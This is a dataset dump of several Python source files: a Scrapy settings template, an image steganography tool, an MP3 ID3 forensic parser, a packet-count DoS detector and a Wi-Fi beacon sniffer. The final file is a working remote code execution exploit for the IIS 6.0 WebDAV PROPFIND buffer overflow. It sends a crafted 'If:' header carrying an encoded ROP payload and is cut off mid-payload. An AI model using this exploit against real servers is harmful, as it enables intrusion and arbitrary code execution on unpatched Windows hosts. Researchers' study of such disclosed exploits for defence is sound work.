repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
# -*- coding: utf-8 -*-
# Scrapy settings for books project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# NOTE: the commented-out entries below document Scrapy's defaults; uncomment
# and edit a line to override the default value.
BOT_NAME = 'books'
SPIDER_MODULES = ['books.spiders']
NEWSPIDER_MODULE = 'books.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'books (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
#   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#   'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
#    'books.middlewares.BooksSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
#    'books.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
#    'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
#    'books.pipelines.BooksPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 33.274725 | 109 | 0.764272 |
#!/usr/bin/env python
from optparse import OptionParser
from PIL import Image
def HideMessage(carrier, message, outfile):
    """Hide a 1-bit rendering of *message* inside *carrier* (LSB steganography).

    The message image is resized to the carrier's dimensions and reduced to
    1-bit black/white; each message pixel is then stored in the least
    significant bit of the red channel of the matching carrier pixel.

    carrier -- filename of the cover image
               (assumes pixels expose at least 3 channels via getpixel --
                a palette or grayscale carrier would break ip[0]/ip[1]/ip[2];
                TODO confirm expected carrier modes)
    message -- filename of the image to hide
    outfile -- filename the steg image is saved to
    """
    cImage = Image.open(carrier)
    hide = Image.open(message)
    # Match the carrier's size, then convert to mode '1' so every message
    # pixel becomes either 0 (black) or 255 (white).
    hide = hide.resize(cImage.size)
    hide = hide.convert('1')
    out = Image.new(cImage.mode, cImage.size)
    width, height = cImage.size
    newArray = []
    for h in range(height):
        for w in range(width):
            ip = cImage.getpixel((w,h))
            hp = hide.getpixel((w,h))
            if hp == 0: # Force 0 And with 254
                newred = ip[0] & 254
            else: # Force 1 Or with 1
                newred = ip[0] | 1
            # Only the red channel carries data; green/blue pass through.
            # NOTE(review): a 4th (alpha) channel, if present, is dropped here.
            newArray.append((newred, ip[1], ip[2]))
    out.putdata(newArray)
    out.save(outfile)
    print "Steg image saved to " + outfile
def ExtractMessage(carrier, outfile):
    """Recover an image hidden by HideMessage from *carrier*.

    Reads the least significant bit of each pixel's red channel and writes
    a grayscale ('L' mode) image: LSB 0 -> black (0), LSB 1 -> white (255).

    carrier -- filename of the steg image produced by HideMessage
    outfile -- filename the recovered image is saved to
    """
    cImage = Image.open(carrier)
    out = Image.new('L', cImage.size)
    width, height = cImage.size
    newArray = []
    for h in range(height):
        for w in range(width):
            ip = cImage.getpixel((w,h))
            # Test the red channel's least significant bit
            if ip[0] & 1 == 0:
                newArray.append(0)
            else:
                newArray.append(255)
    out.putdata(newArray)
    out.save(outfile)
    print "Message extracted and saved to " + outfile
if __name__ == "__main__":
    # Command-line driver: by default embed -m into -c and save to -o;
    # with -e/--extract, recover the hidden image from -c into -o.
    usage = "usage: %prog [options] arg1 arg2"
    parser = OptionParser(usage=usage)
    parser.add_option("-c", "--carrier", dest="carrier",
                      help="The filename of the image used as the carrier.",
                      metavar="FILE")
    parser.add_option("-m", "--message", dest="message",
                      help="The filename of the image that will be hidden.",
                      metavar="FILE")
    # NOTE(review): -o is also used as the embed-mode output filename, not
    # only for extraction as the help text suggests.
    parser.add_option("-o", "--output", dest="output",
                      help="The filename the hidden image will be extracted to.",
                      metavar="FILE")
    parser.add_option("-e", "--extract",
                      action="store_true", dest="extract", default=False,
                      help="Extract hidden image from carrier and save to output filename.")
    (options, args) = parser.parse_args()
    if options.extract == True:
        # Extraction needs only the carrier and the output filename
        if options.carrier is None or options.output is None:
            parser.error("a carrier filename -c and output file -o are required for extraction")
        else:
            ExtractMessage(options.carrier, options.output)
    else:
        # Embedding needs carrier, message and output filenames
        if options.carrier is None or options.message is None or options.output is None:
            parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
        else:
            HideMessage(options.carrier, options.message, options.output)
| 32.506173 | 115 | 0.579064 |
'''
MP3-ID3Forensics
Python Script (written completely in Python)
For the extraction of meta data and
potential evidence hidden in MP3 files
specifically in the ID3 Headers
Author C. Hosmer
Python Forensics
Copyright (c) 2015-2016 Chet Hosmer / Python Forensics, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
'''
# IMPORT MODULES
# Standard Python Libraries
import os # Standard Operating System Methods
import argparse # Command Line Argument Parsing
from struct import * # Handle Strings as Binary Data
import string # Special string Module
import time # Date Time Module
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calculate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
    """Return a (label, timestamp-string) pair for the current moment.

    timeStyle -- 'UTC' for UTC time; any other value yields local time.
    """
    now = time.time()
    if timeStyle == 'UTC':
        return ('UTC Time: ', time.asctime(time.gmtime(now)))
    return ('LOC Time: ', time.asctime(time.localtime(now)))
# End GetTime Function ============================
#
# Print Hexidecimal / ASCII Page Heading
#
def PrintHeading():
    """Print the two-line column banner for the hex/ASCII dump."""
    banner = (
        "Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ASCII",
        "------------------------------------------------------------------------------------------------",
    )
    for line in banner:
        print(line)
    return
# End PrintHeading
#
# Print ID3 Frame Contents
#
# Input: buff - Holding the frame content
# buffSize - Size of the frame contents
#
def PrintContents(buff, buffSize):
    """Hex/ASCII dump of *buff* (a byte string), 16 bytes per row.

    buff     -- the frame content to dump
    buffSize -- number of bytes of buff to display
    """
    PrintHeading()
    offset = 0
    # Loop through 1 line at a time
    for i in range(offset, offset+buffSize, 16):
        # Print the current offset
        print "%08x " % i,
        # Print 16 Hex Bytes (pad with spaces past the end of the buffer
        # so the ASCII column stays aligned)
        for j in range(0,16):
            if i+j >= buffSize:
                print '   ',
            else:
                byteValue = ord(buff[i+j])
                print "%02x " % byteValue,
        print "  ",
        # Print the 16 ASCII equivalents
        for j in range (0,16):
            if i+j >= buffSize:
                break
            byteValue = ord(buff[i+j])
            # If printable characters print them, otherwise a '.' placeholder
            if (byteValue >= 0x20 and byteValue <= 0x7f):
                print "%c" % byteValue,
            else:
                print '.',
        print
    return
# End Print Buffer
'''
ID3 Class
Extracting Meta and Evidence from mp3 files
'''
class ID3():
#Class Constructor
def __init__(self, theFile):
# Initialize Attributes of the Object
# Local Constants
self.KNOWN_TAGS_V3 = {
'AENC': 'Audio encryption: ',
'APIC': 'Attached picture: ',
'COMM': 'Comments: ',
'COMR': 'Commercial frame: ',
'ENCR': 'Encryption method registration: ',
'EQUA': 'Equalization: ',
'ETCO': 'Event timing codes: ',
'GEOB': 'General encapsulated object: ',
'GRID': 'Grp identification registration: ',
'IPLS': 'Involved people list: ',
'LINK': 'Linked information: ',
'MCDI': 'Music CD identifier: ',
'MLLT': 'MPEG location lookup table: ',
'OWNE': 'Ownership frame: ',
'PRIV': 'Private frame: ',
'PCNT': 'Play counter: ',
'POPM': 'Popularimeter: ',
'POSS': 'Position synchronisation frame: ',
'RBUF': 'Recommended buffer size: ',
'RGAD': 'Replay Gain Adjustment: ',
'RVAD': 'Relative volume adjustment: ',
'RVRB': 'Reverb: ',
'SYLT': 'Synchronized lyric/text: ',
'SYTC': 'Synchronized tempo codes: ',
'TALB': 'Album/Movie/Show title: ',
'TBPM': 'BPM beats per minute: ',
'TCOM': 'Composer: ',
'TCON': 'Content type: ',
'TCOP': 'Copyright message: ',
'TDAT': 'Date: ',
'TDLY': 'Playlist delay: ',
'TDRC': 'Recording Time: ',
'TENC': 'Encoded by: ',
'TEXT': 'Lyricist/Text writer: ',
'TFLT': 'File type: ',
'TIME': 'Time: ',
'TIT1': 'Content group description: ',
'TIT2': 'Title/songname/content descrip: ',
'TIT3': 'Subtitle/Description refinement: ',
'TKEY': 'Initial key: ',
'TLAN': 'Language: ',
'TLEN': 'Length: ',
'TMED': 'Media type: ',
'TOAL': 'Original album/movie/show title: ',
'TOFN': 'Original filename: ',
'TOLY': 'Original lyricist/text writer: ',
'TOPE': 'Original artist/performer: ',
'TORY': 'Original release year: ',
'TOWN': 'File owner/licensee: ',
'TPE1': 'Lead performer/Soloist: ',
'TPE2': 'Band/orchestra/accompaniment: ',
'TPE3': 'Conductor/performer refinement: ',
'TPE4': 'Interpreted, remixed, modified by:',
'TPOS': 'Part of a set: ',
'TPUB': 'Publisher: ',
'TRCK': 'Track number/Position in set: ',
'TRDA': 'Recording dates: ',
'TRSN': 'Internet radio station name: ',
'TRSO': 'Internet radio station owner: ',
'TSIZ': 'Size: ',
'TSRC': 'Intl standard recording code: ',
'TSSE': 'SW/HW settings used for encoding: ',
'TYER': 'User defined text frame: ',
'TXXX': 'User define general text frame: ',
'UFID': 'Unique file identifier: ',
'USER': 'Terms of use: ',
'USLT': 'Unsyched lyric/text transcription:',
'WCOM': 'Commercial information: ',
'WCOP': 'Copyright/Legal informationL ',
'WOAF': 'Official audio file webpage: ',
'WOAR': 'Official artist/performer webpage:',
'WOAS': 'Official audio source webpage: ',
'WORS': 'Official internet radio homepage: ',
'WPAY': 'Payment: ',
'WPUB': 'Publishers official webpage: ',
'WXXX': 'User defined URL link frame: '
}
self.KNOWN_TAGS_V2 = {
'BUF': 'Recommended buffer size',
'COM': 'Comments',
'CNT': 'Play counter',
'CRA': 'Audio Encryption',
'CRM': 'Encrypted meta frame',
'ETC': 'Event timing codes',
'EQU': 'Equalization',
'GEO': 'General encapsulated object',
'IPL': 'Involved people list',
'LNK': 'Linked information',
'MCI': 'Music CD Identifier',
'MLL': 'MPEG location lookup table',
'PIC': 'Attached picture',
'POP': 'Popularimeter',
'REV': 'Reverb',
'RVA': 'Relative volume adjustment',
'SLT': 'Synchronized lyric/text',
'STC': 'Synced tempo codes',
'TAL': 'Album/Movie/Show title',
'TBP': 'BPM Beats Per Minute',
'TCM': 'Composer',
'TCO': 'Content type',
'TCR': 'Copyright message',
'TDA': 'Date',
'TDY': 'Playlist delay',
'TEN': 'Encoded by',
'TFT': 'File type',
'TIM': 'Time',
'TKE': 'Initial key',
'TLA': 'Languages',
'TLE': 'Length',
'TMT': 'Media type',
'TOA': 'Original artists/performers',
'TOF': 'Original filename',
'TOL': 'Original Lyricists/text writers',
'TOR': 'Original release year',
'TOT': 'Original album/Movie/Show title',
'TP1': 'Lead artist(s)/Lead performer(s)/Soloist(s)/Performing group',
'TP2': 'Band/Orchestra/Accompaniment',
'TP3': 'Conductor/Performer refinement',
'TP4': 'Interpreted, remixed, or otherwise modified by',
'TPA': 'Part of a set',
'TPB': 'Publisher',
'TRC': 'International Standard Recording Code',
'TRD': 'Recording dates',
'TRK': 'Track number/Position in set',
'TSI': 'Size',
'TSS': 'Software/hardware and settings used for encoding',
'TT1': 'Content group description',
'TT2': 'Title/Songname/Content description',
'TT3': 'Subtitle/Description refinement',
'TXT': 'Lyricist/text writer',
'TXX': 'Year',
'UFI': 'Unique file identifier',
'ULT': 'Unsychronized lyric/text transcription',
'WAF': 'Official audio file webpage',
'WAR': 'Official artist/performer webpage',
'WAS': 'Official audio source webpage',
'WCM': 'Commercial information',
'WCP': 'Copyright/Legal information',
'WPB': 'Publishers official webpage',
'WXX': 'User defined URL link frame'
}
self.picTypeList = [
'Other',
'fileIcon',
'OtherIcon',
'FrontCover',
'BackCover',
'LeafletPage',
'Media',
'LeadArtist',
'ArtistPerformer',
'Conductor',
'BandOrchestra',
'Composer',
'Lyricist',
'RecordingLocation',
'DuringRecording',
'DuringPerformance',
'MovieScreenCapture',
'Fish',
'Illustration',
'BandArtistLogo',
'PublisherStudioLogo'
]
# Attributes of the Class
self.fileName = ''
self.id3Size = 0
self.fileContents = ''
self.mp3 = False
self.id3 = False
self.hdr = ''
self.flag = 0
self.version = 0
self.revision = 0
self.unsync = False
self.extendedHeader = False
self.experimental = False
self.hasPicture = False
self.imageCount = 0
self.frameList = []
self.padArea = ''
# Now Process the Proposed MP3 File
try:
self.fileName = theFile
with open(theFile, 'rb') as mp3File:
self.fileContents = mp3File.read()
except:
print "Could not process input file: ", theFile
quit()
#Strip off the first 10 characters of the file
stripHeader = self.fileContents[0:6]
#now unpack the header
id3Header = unpack('3sBBB', stripHeader)
self.hdr = id3Header[0]
self.version = id3Header[1]
self.revision = id3Header[2]
self.flag = id3Header[3]
if self.hdr == 'ID3' and self.version in range(2,4):
self.id3 = True
else:
self.id3 = False
print "MP3 File type not supported"
quit()
# If we seem to have a valid MP3 ID3 Header
# Attempt to Process the Header
# Get Size Bytes and unpack them
stripSize = self.fileContents[6:10]
id3Size = unpack('BBBB', stripSize)
# Calculate the Size (this is a bit tricky)
# and add in the 10 byte header not included
# in the size
self.id3Size = self.calcID3Size(id3Size) + 10
# check the unsync flag
if self.flag & 0x60:
self.unsync = True
# check the extended header flag
if self.flag & 0x40:
self.extendedHeader = True
# check the experimental indicator
if self.flag & 0x40:
self.experimental = True
self.processID3Frames()
return
'''
Print out any extracted header information
'''
def printResults(self):
print "==== MP3/ID3 Header Information"
print "ID3 Found: ", self.id3
if self.id3:
print "File: ", self.fileName
print "ID3 Hdr Size: ", self.hdr
print "Version: ", self.version
print "Revision: ", self.revision
print "Size: ", self.id3Size
print "Unsync ", self.unsync
print "Extended Header: ", self.extendedHeader
print "Experimental: ", self.experimental
print "Images Found: ", str(self.imageCount)
print "\n------------------------------------------------------------------------"
print "ID3 Frames"
print "------------------------------------------------------------------------"
for entry in self.frameList:
print "FrameID: ", entry[0]
print "Frame Type: ", entry[1]
print "Frame Size: ", entry[2]
print "Tag Preservation: ", entry[4]
print "File Preservation: ", entry[5]
print "Read Only: ", entry[6]
print "Compressed: ", entry[7]
print "Encrypted: ", entry[8]
print "Group Identity: ", entry[9]
print "\nFrame Content:\n"
PrintContents(entry[3], len(entry[3]))
print "====================================================================================================\n"
print "\nPad Area - Size", len(self.padArea)
if len(self.padArea) != 0:
PrintContents(self.padArea, len(self.padArea))
print "\n\n END PyMP3 Forensics"
def processID3Frames(self):
if self.id3:
# starting first frame location
frameOffset = 10
imageCount = 0
# Loop Through all the frames until we reach
# Null ID
# while self.fileContents[frameOffset] != '\000':
while frameOffset < self.id3Size:
# check for padding
if self.fileContents[frameOffset] == '\000':
# we are at the end of the frame
# and we have found padding
# record the pad area
self.padArea = self.fileContents[frameOffset:self.id3Size]
break
if self.version == 2:
# Version 2 Headers contain
# 6 bytes
# sss = type
# xxx = size
frameID = self.fileContents[frameOffset:frameOffset+3]
if frameID in self.KNOWN_TAGS_V2:
frameDescription = self.KNOWN_TAGS_V2[frameID]
else:
frameDescription = 'Unknown'
frameOffset +=3
stripSize = self.fileContents[frameOffset:frameOffset+3]
frameOffset +=3
frameSize = unpack('BBB', stripSize)
integerFrameSize = self.calcFrameSize(frameSize)
# If the frame is a picture
# extract the contents of the picture and create
# a separate file
if frameID == "PIC":
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 2, integerFrameSize, self.imageCount)
# For version 2 set all version 3 flags to False
tagPreservation = False
filePreservation = False
readOnly = False
compressed = False
encrypted = False
groupID = 0
elif self.version == 3:
# Version 3 Headers contain
# 10 Bytes
# ssss = Type
# xxxx = size
# xx = flags
v3Header = self.fileContents[frameOffset:frameOffset+10]
frameOffset += 10
try:
frameHeader = unpack('!4sIBB', v3Header)
except:
print "Unpack Failed"
quit()
frameID = frameHeader[0]
integerFrameSize = frameHeader[1]
flag1 = frameHeader[2]
flag2 = frameHeader[3]
if frameID == 'APIC':
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 3, integerFrameSize, self.imageCount)
if frameID in self.KNOWN_TAGS_V3:
frameDescription = self.KNOWN_TAGS_V3[frameID]
else:
frameDescription = 'Unknown'
if flag1 & 0x80:
tagPreservation = False
else:
tagPreservation = True
if flag1 & 0x60:
filePreservation = False
else:
filePreservation = True
if flag1 & 0x40:
readOnly = True
else:
readOnly = False
if flag2 & 0x80:
compressed = True
else:
compressed = False
if flag2 & 0x60:
encrypted = True
else:
encrypted = False
if flag2 & 0x40:
groupId = True
else:
groupID = False
else:
print "Version Not Supported"
quit()
frameContent = self.fileContents[frameOffset:frameOffset+integerFrameSize]
frameOffset += integerFrameSize
# Add frame information
self.frameList.append([frameID, frameDescription, integerFrameSize, frameContent, tagPreservation, filePreservation, readOnly, compressed, encrypted, groupID] )
print frameID, frameDescription,
if frameContent[0] == "\000":
frameDump = frameContent[1:]
else:
frameDump = frameContent
frameSnip = ''
if frameID == "COMM":
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
continue
else:
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
break
print frameSnip[0:80]
print
return
'''
extractPicture from ID3 Frame
input: offset to the frame
version (2 or 3)
writes output to an images directory
note the images directory must exist
./images/
'''
def extractPicture(self, off, ver, lenOfFrame, imgCnt):
if ver == 2:
# Now extract the picture type
picType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
picType = picType+self.fileContents[typeOffset]
typeOffset+=1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+".image"+str(imgCnt)+"."+picType
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
elif ver == 3:
# Now extract the picture type
mimeType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
mimeType = mimeType+self.fileContents[typeOffset]
typeOffset+=1
# Set the file extension based on the mime type
if mimeType.find('jpeg'):
ext = "jpg"
elif mimeType.find('png'):
ext = "png"
else:
ext = "dat"
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Next Byte is the Picture Type
picType = self.fileContents[typeOffset]
intPicType = ord(picType)
if intPicType >= 0 and intPicType <= len(self.picTypeList):
picTypeStr = self.picTypeList[intPicType]
else:
picTypeStr = "Unknown"
typeOffset += 1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+'.'+picTypeStr+'.'+str(imgCnt)+"."+ext
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
'''
Calculate the ID3 Size
The ID3 Size is 28 bits spread over 4 bytes in Big Endian Format
the MSB of each byte is ignored and the remaining 7 bits of each byte are
concatenated together to produce a 28 bit string.
For example the four byte size shown below:
0x0 0x1 0x4a 0x3
Creates the following 28 bit string
0000000000000110010100000011
for a decimal integer value of:
25859
Adding in the 10 header bytes (which is not included in the size)
the total size is:
25869
Excerpt from ID3 Standard
The ID3 tag size is the size of the complete tag after
unsychronisation, including padding, excluding the header (total tag
size - 10). The reason to use 28 bits (representing up to 256MB) for
size description is that we don't want to run out of space here.
calcID3Size(receives a tuple of the four bytes)
'''
def calcID3Size(self, bytes):
# Convert the tuple to a list for easy processing
bytes = list(bytes)
# Ensure that the MSB of each Byte is zero
bytes[0] = bytes[0] & 0x7f
bytes[1] = bytes[1] & 0x7f
bytes[2] = bytes[2] & 0x7f
bytes[3] = bytes[3] & 0x7f
# Initialize the bit string we will create
bits = ""
# loop through each byte setting each
# to a '1' or '0' starting with bit 6
for val in bytes:
i = 64
# continue until we process all bits
# from bit 6-0
while i > 0:
if val & i:
bits = bits + '1'
else:
bits = bits + '0'
# move to the next lower bit
i = i/2
# Now simply Convert the Binary String to an Integer
integerSize = int(bits,2)
return integerSize
'''
Calculate the Frame size from the 3 hex bytes provided
Excerpt from ID3v2 Standard
The three character frame identifier is followed by a three byte size
descriptor, making a total header size of six bytes in every frame.
The size is calculated as framesize excluding frame identifier and
size descriptor (frame size - 6).
calcFrameSize(receives a tuple of the three bytes)
'''
def calcFrameSize(self, bytes):
valList = list(bytes)
finalValue = valList[0] << 16
finalValue = finalValue | valList[1] << 8
finalValue = finalValue | valList[2]
return finalValue
'''
Main Program
'''
def main():
print
print "Python Forensics, Inc. www.python-forensics.org"
print "Python MP3 Forensics v 1.0 June 2016"
print "developed by: C. Hosmer"
print
print "Script Started", GetTime()
print
# Process the command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('mp3File')
theArgs = parser.parse_args()
# Obtain the single argument which is the
# full path name of the file to process
mp3File = theArgs.mp3File
# set the output to verbose
verbose = True
print "Processing MP3 File: ", mp3File
print
# Process the mp3File
objID3 = ID3(mp3File)
# If verbose is selected the print results to standard out
# otherwise create a log file
if objID3.id3:
if verbose:
objID3.printResults()
else:
# Turn on Logging
logging.basicConfig(filename='pSearchLog.log',level=logging.DEBUG,format='%(asctime)s %(message)s')
objID3.logResults()
if __name__ == "__main__":
main() | 34.978287 | 176 | 0.450796 |
import socket
import struct
from datetime import datetime
# Minimal flood detector: sniff raw IPv4 frames (Linux only, requires root),
# count packets per source address, and log sources whose count enters the
# detection window to dos.txt.
# Protocol 8 == 0x0800 (ETH_P_IP) in network byte order: IPv4 frames only.
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
# NOTE(review): shadows the builtin 'dict'; maps source IP -> packet count
dict = {}
file_txt = open("dos.txt",'a')
file_txt.writelines("**********")
t1= str(datetime.now())
file_txt.writelines(t1)
file_txt.writelines("**********")
file_txt.writelines("\n")
print "Detection Start ......."
# Log a source only while D_val < count < D_val1, so each flooding source
# is written a bounded number of times rather than on every packet
D_val =10
D_val1 = D_val+10
while True:
    pkt = s.recvfrom(2048)
    # Skip the 14-byte Ethernet header; take the 20-byte IPv4 header
    ipheader = pkt[0][14:34]
    ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
    # Field 3 of the unpack layout is the 4-byte source address
    IP = socket.inet_ntoa(ip_hdr[3])
    print "Source IP", IP
    if dict.has_key(IP):
        dict[IP]=dict[IP]+1
        print dict[IP]
        if(dict[IP]>D_val) and (dict[IP]<D_val1) :
            line = "DDOS Detected "
            file_txt.writelines(line)
            file_txt.writelines(IP)
            file_txt.writelines("\n")
    else:
        dict[IP]=1
| 18.65 | 55 | 0.633121 |
import socket
import sys, os, signal
# Passive 802.11 access-point discovery: listens for beacon frames on an
# interface named mon0 that is already in monitor mode (Linux only, root).
# 0x0003 == ETH_P_ALL: receive every frame seen on the interface.
sniff = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 3)
sniff.bind(("mon0", 0x0003))
# BSSIDs already reported, so each access point is printed only once
ap_list =[]
while True :
    fm1 = sniff.recvfrom(6000)
    fm= fm1[0]
    # Byte 26 compared against 0x80, the beacon frame type/subtype value
    # NOTE(review): these fixed offsets assume a constant-length radiotap
    # header from the capture driver -- confirm for the hardware in use
    if fm[26] == "\x80" :
        if fm[36:42] not in ap_list:
            ap_list.append(fm[36:42])
            # Byte 63 holds the SSID tag length; the SSID text follows at 64
            a = ord(fm[63])
            print "SSID -> ",fm[64:64 +a],"-- BSSID -> ", \
                fm[36:42].encode('hex'),"-- Channel -> ", ord(fm[64 +a+12])
| 23.058824 | 60 | 0.590686 |
'''
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Additional Information: the ScStoragePathFromUrl function is called twice
Vulnerability Type: Buffer overflow
Vendor of Product: Microsoft
Affected Product Code Base: Windows Server 2003 R2
Affected Component: ScStoragePathFromUrl
Attack Type: Remote
Impact Code execution: true
Attack Vectors: crafted PROPFIND data
Has vendor confirmed or acknowledged the vulnerability?:true
Discoverer:Zhiniang Peng and Chen Wu.
Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
'''
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa